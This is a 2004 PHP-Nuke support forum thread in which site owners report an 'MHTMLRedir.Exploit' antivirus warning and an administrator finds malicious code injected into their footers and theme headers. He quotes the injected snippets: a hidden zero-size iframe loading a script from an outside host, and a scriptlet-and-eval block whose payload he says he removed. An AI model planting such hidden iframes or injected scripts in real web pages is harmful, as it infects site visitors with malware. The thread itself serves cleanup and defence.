You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 312 guest(s) and 0 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Nuke Cops :: View topic - MHTMLRedir.Exploit [ ]
 Forum FAQ  •  Search  •   •  Memberlist  •  Usergroups   •  Register  •  Profile •    •  Log in to check your private messages  •  Log in

 
Post new topic  Reply to topicprinter-friendly view
View previous topic Log in to check your private messages View next topic
Author Message
maczan1205
Nuke Soldier
Nuke Soldier


Joined: Mar 30, 2004
Posts: 32

Location: Montréal

PostPosted: Tue Nov 16, 2004 4:39 pm Reply with quoteBack to top

I have a Nuke 7.1 site that has worked great for 6 months and now users that access the site on IE are getting a warning "MHTMLRedir.Exploit" virus has been detected.

How can I check to see if my site is affected?

Is there a way to check the files? I could not find any recent modifications to any of the files and the site works fine.
Find all posts by maczan1205View user's profileSend private message
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12482


PostPosted: Tue Nov 16, 2004 5:19 pm Reply with quoteBack to top

Probably an SQL injection - check your database, probably the messages or the footer

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
Mesum
Support Staff
Support Staff


Joined: Mar 11, 2003
Posts: 842

Location: Chicago

PostPosted: Tue Nov 16, 2004 5:51 pm Reply with quoteBack to top

http://securityresponse.symantec.com/avcenter/venc/data/mhtmlredir.exploit.html

Added any new advertising lately?

_________________
Only FREE Dating site for Desis.
Find all posts by MesumView user's profileSend private messageVisit poster's websiteAIM AddressYahoo MessengerMSN Messenger
maczan1205
Nuke Soldier
Nuke Soldier


Joined: Mar 30, 2004
Posts: 32

Location: Montréal

PostPosted: Tue Nov 16, 2004 6:12 pm Reply with quoteBack to top

Thanks for the replies.

No Ads on the site.

How can I check for the SQL injection?

Or any suggestions on the easiest solution?

I have had a few questions about new "pop ups"
Find all posts by maczan1205View user's profileSend private message
maczan1205
Nuke Soldier
Nuke Soldier


Joined: Mar 30, 2004
Posts: 32

Location: Montréal

PostPosted: Wed Nov 17, 2004 7:56 am Reply with quoteBack to top

Evaders99 wrote:
Probably an SQL injection - check your database, probably the messages or the footer


How can I check for this - start searching the database dump for code?

What am I looking for in the SQL - data?

Any help to point me in the right direction is appreciated.

BTW - I only have 2 messages and the text looks fine, same with the footer - only short text there also - no code.
Find all posts by maczan1205View user's profileSend private message
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12482


PostPosted: Wed Nov 17, 2004 9:57 am Reply with quoteBack to top

Use phpMyAdmin to go to your config table. Look for the footer fields and see if anything is added there.
Go to your messages table and see if anything is added there.

There are possibly other areas if your site has been compromised. I would scour your database and check everything out.

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
maczan1205
Nuke Soldier
Nuke Soldier


Joined: Mar 30, 2004
Posts: 32

Location: Montréal

PostPosted: Wed Nov 17, 2004 5:55 pm Reply with quoteBack to top

Evaders99 wrote:
Use phpMyAdmin to go to your config table. Look for the footer fields and see if anything is added there.
Go to your messages table and see if anything is added there.

There are possibly other areas if your site has been compromised. I would scour your database and check everything out.


Thanks for the suggestions - Checked out the tables, not much there but simple text that matches the text entered on the web site by myself.

Users are reporting the warning as soon as they try to log in - I am at a loss as to where to check next.

I am willing to reinstall the whole site but will lose all the data - I guess I can choose a date before the Problem started and use that data.

I am still not sure what to look for in any of the tables.

Any way thanks for the replies!
Find all posts by maczan1205View user's profileSend private message
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12482


PostPosted: Wed Nov 17, 2004 6:21 pm Reply with quoteBack to top

Give me a link to your Nuke and I'll download the HTML - see I see anything, I will tell you

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12482


PostPosted: Wed Nov 17, 2004 7:30 pm Reply with quoteBack to top

This was added to your footer

Code:

<Iframe Src="http://2awm.com/pop/get.php?user=tt1sp" width=0 height=0></Iframe><center>


I would check your database again. Possibly your theme template too

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
maczan1205
Nuke Soldier
Nuke Soldier


Joined: Mar 30, 2004
Posts: 32

Location: Montréal

PostPosted: Wed Nov 17, 2004 7:46 pm Reply with quoteBack to top

Hey thanks a million!

I found it in the theme, header file.

Seems ok now

Much appreciated.
Find all posts by maczan1205View user's profileSend private message
ybrich
Nuke Soldier
Nuke Soldier


Joined: May 25, 2003
Posts: 16


PostPosted: Thu Nov 18, 2004 5:37 pm Reply with quoteBack to top

mine was injected into the copywrite colum of the config..

Sad
Find all posts by ybrichView user's profileSend private message
chukar
Nuke Cadet
Nuke Cadet


Joined: Nov 19, 2004
Posts: 7


PostPosted: Fri Nov 19, 2004 8:37 am Reply with quoteBack to top

I'm also getting this problem with 7.2 and have searched for the above code but can't locate it.

I have the site secured by restricting my .htaccess file to my ip address, so it's hard to see how someone could get in and insert that code.

I'm mystified.
Find all posts by chukarView user's profileSend private message
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12482


PostPosted: Fri Nov 19, 2004 10:15 am Reply with quoteBack to top

Have a link? Well it really does depend on the tricks the hackers know. IP protection helps, but there are other ways to get through to your site.

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
kewlbrew
Nuke Soldier
Nuke Soldier


Joined: Sep 03, 2004
Posts: 22


PostPosted: Fri Nov 19, 2004 1:25 pm Reply with quoteBack to top

Im having the same trouble. Everytime anyone clicks anything they get a small pop up. I use Nuke 7.0 and checked my header file but didnt see anything. If anyone can take a look at the code its at www.gonewanderin.com/indexold.php I would appreciate it very much


Last edited by kewlbrew on Sat Nov 20, 2004 6:55 am; edited 1 time in total
Find all posts by kewlbrewView user's profileSend private message
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12482


PostPosted: Fri Nov 19, 2004 1:57 pm Reply with quoteBack to top

This was added to your footer:
Code:

 <TEXTAREA id=cxw style="DISPLAY: none"><object data="${PR}" id="obj1" type="text/x-scriptlet" width="0" height="0"></object></TEXTAREA><SCRIPT>                                                                                                                                          </SCRIPT><script language='JavaScript'>eval(String.fromCharCode(**));</script>


Delete from your footer in your database. Read and secure your site: http://www.nukecops.com/postt32206.html

Edit: I went ahead and deleted the characters for **, so someone else cannot try to get this code.

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
Display posts from previous:      
Post new topic  Reply to topicprinter-friendly view
View previous topic Log in to check your private messages View next topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum



Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::
Powered by TOGETHER TEAM srl ITALY http://www.togetherteam.it - DONDELEO E-COMMERCE http://www.DonDeLeo.com - TUTTISU E-COMMERCE http://www.tuttisu.it
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.064 Seconds - 513 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::